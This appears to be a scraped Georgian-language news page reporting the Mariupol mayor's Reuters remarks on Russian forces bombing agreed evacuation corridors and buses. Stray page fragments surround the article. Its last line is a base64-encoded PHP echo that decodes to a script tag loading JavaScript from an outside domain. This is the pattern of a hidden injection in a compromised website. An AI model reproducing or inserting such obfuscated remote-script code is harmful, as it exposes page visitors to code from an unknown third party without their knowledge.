celsiusi
ავერსი საქკაბელი
მარიუპოლის მერი, ვადიმ ბოიჩენკო იმედგაცრუებას გამოხატავს ქალაქიდან მშვიდობიანი მოსახლეობის ევაკუაციის გამო. მისი თქმით, რუსებმა ამას ძირი გამოუთხარეს. ამის შესახებ მან Reuters-თან ინტერვიუში. 
 
მერის თქმით, რომ მტერმა მოითხოვა მიეცათ რუკა, საიდან დაიწყებოდა ევაკუაცია, ასევე კითხეს რამდენი ავტობუსი ჰყავდათ. გადასცეს ყველაფერი რაც ჰუმანიტარულ დერეფნებს ეხებოდა, მათ კი გაანადგურეს ყველა ადგილი და ავტობუსები.
 
"ადამიანების ევაკუაცია მარტის პირველივე დღეებიდან დავიწყეთ, თუმცა, რუსები ყოველ დღე არღვევდნენ პირობას, დათქმული გვქონდა ადგილები, რუკები და ავტობუსების რაოდენობის შესახებ ინფორმაცია მოითხოვეს, ყველაფერი მივეცით, რაც უსაფრთხო დერეფნებს ეხებოდა, ისინი კი ამას ბოროტად იყენებდნენ და ბომბავდნენ როგორც დერეფნის ტერიტორიას, ისე ავტობუსებს.
 
ქალაქში 100 000 ადამიანი ამ დრომდე რჩება, ეს მოქალაქეები ყოველ დღე მოდიან და ევაკუაციას ითხოვენ. გუშინ 90 ავტობუსი უნდა მოსულიყო, თუმცა რუსებმა მხოლოდ 7 შემოუშვეს", - ამბობს ვადიმ ბოიჩენკო.
 
 
726
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");